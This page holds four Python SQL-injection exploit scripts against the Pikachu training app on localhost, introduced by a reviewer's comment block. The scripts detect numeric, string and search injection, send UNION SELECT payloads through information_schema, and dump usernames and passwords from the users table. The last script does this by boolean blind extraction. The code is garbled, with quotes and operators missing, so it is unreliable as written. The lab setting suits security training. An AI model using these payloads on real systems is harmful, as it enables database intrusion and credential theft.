Pikachu 的 Python 一键 exp：数字型注入、字符型注入、搜索型注入 1、搜索型注入 2
# Four stand-alone SQL-injection lab scripts pasted back to back, all aimed at a
# locally hosted Pikachu training app (sqli_id.php, sqli_str.php and
# sqli_search.php under /pikachu-master/vul/sqli/ on localhost / 127.0.0.1).
# Each script begins at its own `import requests`; the boundaries fall mid-line
# in the text below.
#
# NOTE(review): this listing is extraction-garbled, not merely unformatted.
# String quotes, the `=`/`!=`/`<`/`>`/`+` operators and the contents of the
# bracketed status markers were dropped (e.g. `1 or 11`, `while left right`,
# `f.write(line.strip() \n)`, `print([] ...)`), so it is not runnable as shown
# and the lost characters cannot be recovered from this page alone.
#
# What the visible text does:
#   Scripts 1-3 (sqli_id / sqli_str / sqli_search): send one request whose
#   `id`/`name` value carries a true boolean tail and one with a false tail,
#   treat a difference in `len(res.text)` as "injectable" (otherwise `exit()`),
#   then issue UNION SELECT payloads against information_schema and `users`,
#   scrape the reflected values out of the HTML with `re` (`your email is:`,
#   `hello,`, `your uid:`, `username...uid:...email is:`), and append them to a
#   local text file (sqli_id_final.txt / sqli_final.txt /
#   sqli_search_final.txt). When the regex finds nothing they fall back to
#   printing raw page lines that contain the marker words.
#   Script 4 (127.0.0.1, sqli_search.php): boolean-based blind extraction.
#   `is_true()` reports whether the response body contains the literal
#   `username`; `dump_data()` recovers a sub-select one character at a time by
#   binary search over `ascii(substr(...))` between 32 and 126, for
#   `range(1, 50)` positions, and the `__main__` block chains it for the
#   database name, table names, column names and `username:password` pairs.
#
# Defects visible in the text, beyond the garbling:
#   - Script 2 calls `.group(1)` straight on `re.search(...)`; with no match
#     that raises AttributeError. Script 1 checks the match object first.
#   - Injectability is judged from `len(res.text)` alone, so any dynamic page
#     content (timestamps, tokens, error text) makes the check unreliable.
#   - `dump_data()` hard-codes the 49-position limit and the 32-126 range;
#     longer or non-ASCII values are cut off. Its break condition on `left`
#     lost its operator, so the exact stop rule cannot be read from here.
#   - `exit()` inside the `with` block is the site-module helper, not
#     `sys.exit()`; it works in a script but not when `-S` is used.
#
# Defender's view: every request is a plain GET/POST to a page that reflects
# query results verbatim, which is what makes both the UNION and the boolean
# variants work. Server side the class disappears with parameterised queries
# in place of string-built SQL. On the wire the distinguishing tokens are
# `union select`, `information_schema`, `group_concat(` and `ascii(substr(`
# inside an `id`/`name` parameter, and for script 4 a long burst of
# near-identical requests to sqli_search.php that differ in a single integer.
import requests import re url http://localhost/pikachu-master/vul/sqli/sqli_id.php if __name__ __main__: with open(sqli_id_final.txt, w, encodingutf-8) as f: print( 1. 判断数字型注入 ) res_true requests.post(url, data{id: 1 or 11, submit: 查询}) res_false requests.post(url, data{id: 1 and 12, submit: 查询}) if len(res_true.text) ! len(res_false.text): print([] 存在数字型注入) f.write([] 存在数字型注入\n\n) else: print([-] 注入失败) exit() print(\n 2. 爆库/表/字段修复版 ) # 爆库确保union select字段数为2且位置正确 db_payload 1 union select 1,database() db_res requests.post(url, data{id: db_payload, submit: 查询}) # 适配新的回显格式 db_match re.search(ryour email is: (.*?)/p, db_res.text, re.S) if db_match: db_name db_match.group(1).strip() print(f库名: {db_name}) f.write(f库名: {db_name}\n) else: print([-] 爆库失败页面无回显) # 兜底打印页面片段 print(db_res.text[:500]) # 爆表 table_payload 1 union select 1,group_concat(table_name) from information_schema.tables where table_schemadatabase() table_res requests.post(url, data{id: table_payload, submit: 查询}) table_match re.search(ryour email is: (.*?)/p, table_res.text, re.S) if table_match: tables table_match.group(1).strip() print(f表名: {tables}) f.write(f表名: {tables}\n) else: print([-] 爆表失败) # 爆字段 col_payload 1 union select 1,group_concat(column_name) from information_schema.columns where table_nameusers and table_schemadatabase() col_res requests.post(url, data{id: col_payload, submit: 查询}) col_match re.search(ryour email is: (.*?)/p, col_res.text, re.S) if col_match: cols col_match.group(1).strip() print(f字段: {cols}) f.write(f字段: {cols}\n\n) else: print([-] 爆字段失败) print(\n 3. 直接爆账号密码适配当前回显格式 ) # 核心Payload直接用2个字段适配原始SQL pwd_payload 1 union select username,password from users pwd_res requests.post(url, data{id: pwd_payload, submit: 查询}) # 修复版正则适配你当前页面的 br / 格式 pattern re.compile(rhello,(.*?) 
br\s*/your email is: (.*?)/p, re.S) matches pattern.findall(pwd_res.text) if matches: print([] 账号密码列表) f.write([] 账号密码列表\n) for username, password in matches: print(f账号: {username.strip()} | 密码: {password.strip()}) f.write(f账号: {username.strip()} | 密码: {password.strip()}\n) else: print([-] 未提取到账号数据直接打印页面关键片段) for line in pwd_res.text.splitlines(): if hello in line or your email in line: print(line.strip()) f.write(line.strip() \n) print(\n[√] 结果已保存到 sqli_id_final.txt)import requests import re url http://localhost/pikachu-master/vul/sqli/sqli_str.php if __name__ __main__: with open(sqli_final.txt, w, encodingutf-8) as f: print( 1. 判断注入 ) res_true requests.get(url, params{name: kobe or 11 #, submit: 查询}) res_false requests.get(url, params{name: kobe and 12 #, submit: 查询}) if len(res_true.text) ! len(res_false.text): print([] 存在字符型注入) f.write([] 存在字符型注入\n\n) else: print([-] 注入失败) exit() print(\n 2. 爆库/表/字段 ) # 爆库 db_payload union select 1,database() # db_res requests.get(url, params{name: db_payload, submit: 查询}) db_name re.search(ryour email is: (.*?)/p, db_res.text, re.S).group(1).strip() print(f库名: {db_name}) f.write(f库名: {db_name}\n) # 爆表 table_payload union select 1,group_concat(table_name) from information_schema.tables where table_schemapikachu # table_res requests.get(url, params{name: table_payload, submit: 查询}) tables re.search(ryour email is: (.*?)/p, table_res.text, re.S).group(1).strip() print(f表名: {tables}) f.write(f表名: {tables}\n) # 爆字段 col_payload union select 1,group_concat(column_name) from information_schema.columns where table_nameusers and table_schemapikachu # col_res requests.get(url, params{name: col_payload, submit: 查询}) cols re.search(ryour email is: (.*?)/p, col_res.text, re.S).group(1).strip() print(f字段: {cols}) f.write(f字段: {cols}\n\n) print(\n 3. 
直接爆账号密码 ) # 核心Payload固定顺序不会出错 pwd_payload union select username,password from users # pwd_res requests.get(url, params{name: pwd_payload, submit: 查询}) # 修复版正则只匹配2个分组不会拆包失败 pattern re.compile(ryour uid:(.*?)br\s*/your email is:(.*?)/p, re.S) matches pattern.findall(pwd_res.text) if matches: print([] 账号密码列表) f.write([] 账号密码列表\n) for username, password in matches: print(f账号: {username.strip()} | 密码: {password.strip()}) f.write(f账号: {username.strip()} | 密码: {password.strip()}\n) else: print([-] 未提取到账号数据直接打印页面关键片段) # 直接打印页面中所有包含 your uid/your email 的行 for line in pwd_res.text.splitlines(): if your uid in line or your email in line: print(line.strip()) f.write(line.strip() \n) print(\n[√] 结果已保存到 sqli_final.txt)import requests import re url http://localhost/pikachu-master/vul/sqli/sqli_search.php if __name__ __main__: with open(sqli_search_final.txt, w, encodingutf-8) as f: print( 1. 判断搜索型注入 ) payload xxx% OR 11 # res_true requests.get(url, params{name: payload, submit: 搜索}) res_false requests.get(url, params{name: xxx% AND 12 #, submit: 搜索}) if len(res_true.text) ! len(res_false.text): print([] 存在搜索型注入注释符闭合) f.write([] 存在搜索型注入注释符闭合\n\n) else: print([-] 注入失败) exit() print(\n 2. 
获取页面关键片段 ) pwd_res requests.get(url, params{name: payload, submit: 搜索}) # 打印所有包含用户信息的行 for line in pwd_res.text.splitlines(): if username in line or email in line or uid in line: print(line.strip()) f.write(line.strip() \n) # 修复版正则只匹配 2 个有效分组彻底解决拆包错误 # 匹配格式usernamexxxbr /uid:1 br /email is: xxx pattern re.compile(rusername([^])br\s*/uid:(\d)\s*br\s*/email is:\s*([^])/p, re.S) matches pattern.findall(pwd_res.text) if matches: print(\n[] 提取到的账号密码) f.write(\n[] 提取到的账号密码\n) for uname, uid, email in matches: print(fuid:{uid} | 账号:{uname.strip()} | 邮箱/密码:{email.strip()}) f.write(fuid:{uid} | 账号:{uname.strip()} | 邮箱/密码:{email.strip()}\n) else: print(\n[-] 未提取到账号数据可参考上方页面片段) f.write(\n[-] 未提取到账号数据\n) print(\n[√] 结果已保存到 sqli_search_final.txt)import requests # 目标URL url http://127.0.0.1/pikachu-master/vul/sqli/sqli_search.php def is_true(payload): # 构造注入存在返回True不存在返回False params { name: fxxx% OR {payload}#, submit: 搜索 } r requests.get(url, paramsparams) # 页面有结果返回True无结果返回False return username in r.text # 爆数据函数 def dump_data(sql): result print(正在提取, end) for i in range(1, 50): left, right 32, 126 while left right: mid (left right) // 2 payload fascii(substr(({sql}),{i},1)){mid} if is_true(payload): left mid 1 else: right mid - 1 if left 32: break result chr(left) print(chr(left), end, flushTrue) print() return result if __name__ __main__: print(*60) print( Pikachu 搜索型注入 布尔盲注 全自动爆库) print(*60) # 1 爆数据库 print(\n[1] 当前数据库) db dump_data(select database()) # 2 爆表名 print(\n[2] 表名) tables dump_data(select group_concat(table_name) from information_schema.tables where table_schemadatabase()) # 3 爆字段 print(\n[3] users 表字段) cols dump_data(select group_concat(column_name) from information_schema.columns where table_nameusers) # 4 爆账号密码 print(\n[4] 账号 | 密码) print(-*40) data dump_data(select group_concat(username,:,password) from users) for line in data.split(,): if : in line: user, pwd line.split(:,1) print(f账号{user} | 密码{pwd}) print(-*40) print(\n[✅ 脱库完成])